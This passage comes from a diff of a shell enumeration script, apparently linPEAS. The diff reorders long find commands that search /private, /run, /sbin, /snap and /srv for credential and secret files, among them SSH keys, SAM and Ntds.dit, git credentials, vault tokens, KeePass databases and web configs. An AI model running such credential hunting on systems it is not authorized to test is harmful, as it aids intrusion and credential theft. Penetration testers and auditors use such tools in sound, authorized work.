\".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_PRIVATE=`eval_bckgrd "find /private -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"agent*\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \"sess_*\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_RUN=`eval_bckgrd "find /run -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SBIN=`eval_bckgrd "find /sbin -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SNAP=`eval_bckgrd "find /snap -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SRV=`eval_bckgrd "find /srv -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SBIN=`eval_bckgrd "find /sbin -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SNAP=`eval_bckgrd "find /snap -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name 